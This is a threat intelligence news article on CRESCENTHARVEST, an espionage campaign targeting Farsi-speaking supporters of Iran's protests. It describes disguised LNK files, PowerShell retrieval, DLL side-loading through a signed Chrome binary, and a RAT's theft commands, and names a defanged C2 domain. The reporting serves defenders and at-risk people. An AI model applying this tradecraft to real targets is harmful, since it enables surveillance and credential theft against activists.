CRESCENTHARVEST: Iranian Protest Supporters Targeted by Advanced Cyber Espionage Campaign
In a recent development, cybersecurity experts have uncovered a sophisticated cyber espionage campaign named CRESCENTHARVEST, which appears to be targeting individuals supporting the ongoing protests in Iran. The Acronis Threat Research Unit (TRU) identified this activity starting January 9, 2026, noting that the attackers aim to deploy a remote access trojan (RAT) capable of executing commands, logging keystrokes, and exfiltrating sensitive data. The success rate of these attacks remains uncertain at this time.
The campaign leverages the current geopolitical climate by enticing victims to open malicious .LNK files disguised as images or videos related to the protests. These files are bundled with genuine media content and a Farsi-language report titled Updates from the Rebellious Cities of Iran, enhancing their credibility among Farsi-speaking individuals seeking protest-related information.
While the exact origin of CRESCENTHARVEST is yet to be confirmed, it is believed to be orchestrated by an Iran-aligned threat group. This marks the second such campaign targeting specific individuals following the nationwide protests that began in late 2025. In January 2026, French cybersecurity firm HarfangLab detailed a similar operation named RedKitten, which targeted non-governmental organizations and individuals documenting human rights abuses in Iran, deploying a custom backdoor known as SloppyMIO.
The initial access vector for CRESCENTHARVEST remains unknown, but it is suspected that the attackers employ spear-phishing tactics or prolonged social engineering efforts. These methods involve building rapport with victims over time before delivering the malicious payloads. Iranian hacking groups like Charming Kitten and Tortoiseshell have a history of using sophisticated social engineering attacks, often creating fake personas and cultivating relationships with targets over extended periods before deploying malware.
The attack sequence begins with a malicious RAR archive claiming to contain information related to the Iranian protests. This archive includes various images and videos, along with two Windows shortcut (LNK) files masquerading as image or video files by using a double extension trick (e.g., .jpg.lnk or .mp4.lnk). When launched, these deceptive files execute PowerShell code to retrieve another ZIP archive while simultaneously opening a harmless image or video, tricking the victim into believing they have accessed legitimate content.
Within the retrieved ZIP archive is a legitimate Google-signed binary (software_reporter_tool.exe) from Chrome’s cleanup utility, accompanied by several DLL files, including two malicious libraries:
– urtcbased140d_d.dll: A C++ implant that extracts and decrypts Chrome’s app-bound encryption keys through COM interfaces, sharing similarities with an open-source project known as ChromElevator.
– version.dll (CRESCENTHARVEST): A remote access tool that enumerates installed antivirus products and security tools, lists local user accounts, loads DLLs, and harvests system metadata, browser credentials, Telegram desktop account data, and keystrokes.
CRESCENTHARVEST utilizes Windows WinHTTP APIs to communicate with its command-and-control (C2) server (servicelog-information[.]com), allowing it to blend in with regular traffic. The malware supports various commands, including:
– Anti: Performs anti-analysis checks.
– His: Steals browser history.
– Dir: Lists directories.
– Cwd: Retrieves the current working directory.
– Cd: Changes directory.
– GetUser: Obtains user information.
– ps: Executes PowerShell commands (currently non-functional).
– KeyLog: Activates keylogger.
– Tel_s: Steals Telegram session data.
– Cook: Steals browser cookies.
– Info: Steals system information.
– F_log: Steals browser credentials.
– Upload: Uploads files.
– shell: Executes shell commands.
This campaign underscores a decade-long pattern of suspected nation-state cyber espionage operations targeting journalists, activists, researchers, and diaspora communities globally. The tactics observed in CRESCENTHARVEST reflect well-established methods, including LNK-based initial access, DLL side-loading through signed binaries, credential harvesting, and social engineering aligned with current events.
This revelation comes shortly after reports that Iran’s government likely tracked protesters’ locations through their phones, sending them text messages warning that their presence at illegal gatherings had been recorded and that they were under intelligence monitoring. This move appears to be an attempt to suppress dissent. According to a report by Iran-focused digital rights group Holistic Resilience, some individuals who posted on social media about the protests and other political topics have had their SIM cards suspended.
The Islamic Republic is developing a distinct model of digital control and surveillance, one that is not based on permanent isolation but on conditional and interruptible connectivity. The central pillar of this model is the National Information Network (NIN), which evolves continuously alongside advances in communications technologies and is expanded in response to changing technical and political requirements.
This strategy combines information from e-government databases, surveillance cameras, and malware deployed via social engineering to establish remote access and monitor citizens’ online activities in a sustained manner. One such tool is a lightweight modular trojan called 2Ac2 RAT, designed for victim device control and data collection.
The CRESCENTHARVEST campaign highlights the ongoing cyber threats faced by individuals involved in political activism and underscores the need for heightened cybersecurity awareness and protective measures among those at risk.
